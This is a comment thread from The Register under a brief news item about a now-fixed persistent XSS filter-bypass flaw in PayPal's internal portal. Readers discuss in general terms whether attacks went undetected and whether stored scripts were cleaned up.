back to article XSS marks the spot: PayPal portal peril plugged

PayPal has plugged a potentially nasty flaw on its internal portal. The vulnerability, discovered by security analyst Benjamin Kunz Mejri of Vulnerability Laboratory, involved security shortcomings in PayPal's backend systems. More specifically, he said, it was an application-side filter bypass vulnerability in the official …

  1. Crazy Operations Guy Silver badge

    "There's no evidence that any of these attacks actually occurred."

    Just because there is no evidence, that doesn't mean something didn't happen. The vulnerability allows running scripts on back-end system, it wouldn't be too much of a stretch to think that that might include the ability to interact with the logging system or run a basic line editor to delete the specific log entries.

    1. Notas Badoff

      Re: "There's no evidence that any of these attacks actually occurred."

      "The persistent input validation vulnerability allows remote attackers to inject own malicious script codes on the application-side of the vulnerable service."

      Um, so we ought to be hearing that they have thoroughly scrubbed all the data that could have had scripts inserted, right? But we didn't?

      In fact, when we've heard about attacks allowing persistent storage of evil scripts, when did we ever hear that the 'fix' included checking that nothing evil remains stored?

    2. fearnothing

      Re: "There's no evidence that any of these attacks actually occurred."

      Remember that places of this size will have IDS/IPS, reverse proxy and web app firewall logs which would most likely detect such activity. The logs that theoretical attackers may have had access to would not have been the only means of verifying an attack.

  2. btrower

    I am stunned to hear about another security issue

    Not.

POST COMMENT House rules

Not a member of The Register? Create a new account here.

  • Enter your comment

  • Add an icon

Anonymous cowards cannot choose their icon

Biting the hand that feeds IT © 1998–2019